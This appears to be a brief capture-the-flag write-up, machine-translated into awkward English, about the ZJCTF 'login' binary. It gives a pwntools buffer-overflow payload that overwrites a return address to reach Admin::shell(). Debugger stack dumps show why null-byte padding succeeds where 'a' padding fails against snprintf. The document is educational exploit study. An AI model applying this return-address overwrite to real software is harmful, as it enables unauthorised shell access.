ZJCTF_ login

The problem itself is not difficult , The specific problem-solving process can refer to other Masters write up. Here I mainly record a doubt in my question .

structure payload When , Why ‘a’ Filling will report an error , use ‘\x00’ Filling is no problem ?

The problem is

0x400a39    call   [email protected]                      <[email protected]>

First, let's take a look at a When filling

payload = b'2jctf_pa5sw0rd\0'
payload = payload.ljust(0x48, b'a') + p64(0x400e88)

perform snprintf Function before , The stack structure is as follows ,0x7ffe95152a98 Is the address we want to jump to

00:0000│ rsp        0x7ffe95152a30 —▸ 0x7ffe95152ab0 —▸ 0x7ffe95152c00 —▸ 0x400eb0 (__libc_csu_init) ◂— push   r15
01:0008│            0x7ffe95152a38 —▸ 0x7ffe95152b38 ◂— '2jctf_pa5sw0rd'
02:0010│            0x7ffe95152a40 —▸ 0x6021b8 (login+88) ◂— '2jctf_pa5sw0rd'
03:0018│            0x7ffe95152a48 —▸ 0x7ffe95152ad0 —▸ 0x7ffe95152a98 —▸ 0x400e88 (Admin::shell()) ◂— push   rbp
04:0020│ rcx rdi r8 0x7ffe95152a50 ◂— '2jctf_pa5sw0rd'
05:0028│            0x7ffe95152a58 ◂— 0x6100647230777335 /* '5sw0rd' */
06:0030│            0x7ffe95152a60 ◂— 0x6161616161616161 ('aaaaaaaa')
... ↓               6 skipped
0d:0068│            0x7ffe95152a98 —▸ 0x400e88 (Admin::shell()) ◂— push   rbp
0e:0070│            0x7ffe95152aa0 ◂— 0x0
0f:0078│            0x7ffe95152aa8 ◂— 0x8efdc4a1c20f1800
10:0080│ rbp        0x7ffe95152ab0 —▸ 0x7ffe95152c00 —▸ 0x400eb0 (__libc_csu_init) ◂— push   r15
11:0088│            0x7ffe95152ab8 —▸ 0x400bd8 (main+261) ◂— mov    eax, 0

After execution , Because to 0x7ffe95152a98 The starting position is passed in 50 Characters , Therefore, the original stack structure is destroyed

09:0048│     0x7ffe95152a78 ◂— 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
... ↓        3 skipped
0d:0068│     0x7ffe95152a98 ◂— 0x61616161616161 /* 'aaaaaaa' */
0e:0070│     0x7ffe95152aa0 ◂— 0x0

snprintf Function encountered \x00 Will be truncated , So when we use \x00 When filling , cover sprintf The string of position is Password accepted: Password accepted: \n, The length is not enough to cover the return address we constructed , So at this point getshell success .